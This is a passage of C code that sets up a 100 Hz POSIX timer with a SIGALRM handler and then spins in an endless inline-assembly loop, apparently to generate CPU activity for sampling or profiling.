// Set up the signal handler for SIGALRM
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_flags = SA_SIGINFO;
sa.sa_sigaction = timer_handler;
sigaction(SIGALRM, &sa, NULL);

// Start the timer
struct itimerspec its;
its.it_interval.tv_sec = 0;
its.it_interval.tv_nsec = 10000000; // 100Hz
its.it_value = its.it_interval;
timer_t timerid;
timer_create(CLOCK_MONOTONIC, NULL, &timerid);
timer_settime(timerid, 0, &its, NULL);

// Run a loop to generate some activity
volatile int i;
while (1) {
__asm__ volatile (
"mov $1, %%rax\n\t" // Move 1 to rax
"mov $2, %%rax\n\t" // Move 2 to rax
"mov $3, %%rax\n\t" // Move 3 to rax
"mov $4, %%rax\n\t" // Move 4 to rax
"mov $5, %%rax\n\t" // Move 5 to rax
"mov $6, %%rax\n\t" // Move 6 to rax
"mov $7, %%rax\n\t" // Move 7 to rax
"mov $8, %%rax\n\t" // Move 8 to rax
"mov $9, %%rax\n\t" // Move 9 to rax
"mov $10, %%rax\n\t" // Move 10 to rax

: // No output operand
: // No input operand
: "%rax" // Clobbered register
);
//i = -1; /* 内存写操作 */
}

return 0;
}